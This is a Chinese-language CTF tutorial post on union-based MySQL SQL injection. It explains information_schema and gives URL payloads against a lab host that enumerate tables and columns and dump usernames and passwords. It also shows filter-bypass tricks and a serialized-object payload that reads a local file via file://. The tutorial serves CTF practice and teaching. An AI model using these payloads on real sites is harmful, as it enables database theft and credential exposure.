欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CTF-WEB总结之SQL注入

程序员文章站 2022-05-15 09:18:22
...

简介

SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。CTF-WEB总结之SQL注入
Union注入
CTF-WEB总结之SQL注入
CTF-WEB总结之SQL注入
利用内置函数爆数据库信息及相关信息
version()
database()
user()
current_user()
@@datadir数据库路径
@@basedir mysql安装路径
@@version_compile_os操作系统

mysql>5.0版本会有information_schema ,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。
information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表
总结一下SQL注入中常用到的表:
information_schema这个库

schemata :保存所有数据库的名字

schema_name :列名

tables : 保存所有表的名字

table_schema :数据表所属的数据库名 ,table_name:表名称

columns:保存所有列的名字

column_name 列名

查询数据库中所有的库名 user information_schema ;

select schema_name from schemata ;

查询当前库 select database();

查询当前库的所有的表

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =‘fakebook’ #fakebook是当前数据库名称

查询指定库的所有的表

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()

查询指定库某个表的所有列

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘cms_article’

查询当前库某个表的所有列

select column_name from infromation_schema.columns where table_schema = database() and table_name = ‘users’

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’

查询当前库某个表的所有数据

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

利用informations_schema获取数据库信息
CTF-WEB总结之SQL注入
放大一些:
CTF-WEB总结之SQL注入
获取数据库表的信息
上一步操作获取的数据库名称为:security,转化为16进制:0x7365637572697479
CTF-WEB总结之SQL注入
获取数据库列信息
CTF-WEB总结之SQL注入
获取内容
CTF-WEB总结之SQL注入
limit2,3表示第2行开始的3列
%23是#的url编码
CTF-WEB总结之SQL注入
在url中+就表示空格,有的情况下会过滤空格可使用+代替。有时也使用/**/绕过

SQL注入一般步骤

(这里讲最通用的 mysql>5.0)
获取数据库(非必要,因为前面的database可以获得)and 1=2 union select 1,2,schema_name from information_schema.schemata limit 0(开始的记录,0为第一个开始记录),1(显示1条
记录) %23
获取表 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = ‘数据库名字’(最常用的是十六进制表示的数据库,’容易被过滤) limit 0,1 %23
获取列 and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=0x十六进制数据库 and table_name=0x十六进制表 limit 0,1 %23
获取内容 and 1=2 union select 1,2,concat_ws(char(32,58,32),username,password) from users(表 名) limit 0,1 %23

/view.php?no=-1/**/union/**/select/**/1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
/view.php?no=-1/**/union/**/select/**/1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'%23

O:8:“UserInfo”:3:{s:4:“name”;s:2:“s1”;s:3:“age”;i:12;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}

/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"s1";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

SQL注入中select 1,2,3…的作用

select语句在指明要查询的内容属性(如select id)后,要加from指明是从哪个数据库表中获得数据,在数据库环境中我们一般会先写一句use xxxdatabase,之后写select from语句直接加当前数据库中的表名就可以了。如果我们没有声明使用哪个数据库,也可以直接写 select xxxx from security.users(假设要从security数据库的users表中获取数据)。而select直接加数字串时,可以不写后面的表名,那么它输出的内容就是我们select后的数字,这时我们写的一串数字就是一个数组(或1个行向量),这时select实际上没有向任何一个数据库查询数据,即查询命令不指向任何数据库的表。返回值就是我们输入的这个数组,这时它是个1行n列的表,表的属性名和值都是我们输入的数组,如下图:
CTF-WEB总结之SQL注入
那么这个东西有什么用呢?在SQL注入时,我们可以利用它来进行一个快速测试,在Union注入时,如果我们通过测试已经知道了前面语句的字段数,就可以写入union 注入语句,但存在一个问题,我们虽然可以通过注入获得想要的信息,但这些信息必须能够返回到我们手中,对于网页来说,如何能够让数据回显是至关重要的。例如一个网站的参数传递执行的查询有3个字段,很可能这些字段不是都显示在网页前端的,假如其中的1或2个字段的查询结果是会返回到前端的,那么我们就需要知道这3个字段中哪两个结果会回显,这个过程相当于找到数据库与前端显示的通道。如果我们直接输入查询字段进行查询,语句会非常冗长,而且很可能还需要做很多次测试,这时候我们利用一个简单的select 1,2,3,根据显示在页面上的数字就可以知道哪个数字是这个“通道”,那么我们只需要把这个数字改成我们想查询的内容(如id,password),当数据**成功后,就会在窗口显示我们想要的结果。
这里参考文章https://blog.csdn.net/weixin_44840696/article/details/89166154